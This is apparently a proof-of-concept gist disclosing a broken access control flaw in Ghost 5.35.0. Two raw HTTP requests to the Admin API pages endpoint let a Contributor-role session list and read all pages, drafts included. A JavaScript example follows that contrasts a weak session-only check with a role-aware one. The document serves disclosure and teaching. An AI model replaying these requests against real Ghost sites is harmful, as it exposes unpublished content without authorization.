@yurahod
yurahod/PoC.md Secret
Created March 4, 2023 11:58

[Ghost 5.35.0] Broken Access Controls

Blog Pages Disclosure

Vulnerable API endpoint: `/ghost/api/admin/pages/`. A user holding only the Contributor role is able to list and read the created pages, including draft or hidden ones, through the Admin API.

HTTP Request to get all pages

```http
GET /ghost/api/admin/pages/ HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close
```

HTTP Request to get a specific page

```http
GET /ghost/api/admin/pages/[:pageId] HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close
```
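The root cause described above is an authorization check that is missing or too coarse: authentication alone decides whether the list and read handlers return content. The following is an added illustration, not Ghost's own code or its fix, of the weak handler beside a role-aware one for the two operations shown (list all pages, get one page). The role names, the `PAGES` sample data and the policy that a Contributor may only see pages they authored are assumptions made for the example, not Ghost's actual permission model.

```javascript
// Added example (not Ghost's code): server-side authorization for a
// "pages" resource, weak version beside a role-aware version.
// Roles, sample data and the Contributor policy are assumptions.

// Constructed sample data standing in for the pages table.
const PAGES = [
  { id: 'p1', title: 'About',             status: 'published', authorId: 'u-editor'  },
  { id: 'p2', title: 'Roadmap draft',     status: 'draft',     authorId: 'u-editor'  },
  { id: 'p3', title: 'Contributor draft', status: 'draft',     authorId: 'u-contrib' },
];

// Weak: only checks that *some* session exists, then returns everything.
// This is the shape of check that lets a low-privilege role read all
// pages, drafts included.
function listPagesWeak(user, pages = PAGES) {
  if (!user) throw new Error('401 unauthorized');
  return pages;
}

// Assumed policy: these roles may read every page.
const FULL_READ_ROLES = new Set(['Owner', 'Administrator', 'Editor']);

// Hardened: the role decides the visible set on every request; the
// filter is applied server-side, never left to the client UI.
function listPagesHardened(user, pages = PAGES) {
  if (!user) throw new Error('401 unauthorized');
  if (FULL_READ_ROLES.has(user.role)) return pages;
  if (user.role === 'Contributor') {
    // Assumed policy: contributors see only pages they authored.
    return pages.filter((p) => p.authorId === user.id);
  }
  throw new Error('403 forbidden');
}

// Single-page read reuses the same visibility rule so the two endpoints
// cannot drift apart. A hidden page answers 404, not 403, so the caller
// cannot tell "exists but hidden" from "does not exist".
function getPageHardened(user, pageId, pages = PAGES) {
  const visible = listPagesHardened(user, pages);
  const page = visible.find((p) => p.id === pageId);
  if (!page) throw new Error('404 not found');
  return page;
}

// Stand-alone demonstration.
const contributor = { id: 'u-contrib', role: 'Contributor' };
console.log('weak list size for contributor:', listPagesWeak(contributor).length);      // 3
console.log('hardened list for contributor:', listPagesHardened(contributor).map((p) => p.id)); // ['p3']
```

The important design point is that `getPageHardened` derives its answer from the same `listPagesHardened` rule rather than carrying its own check, so the list and by-id endpoints can never disagree about what a role may see.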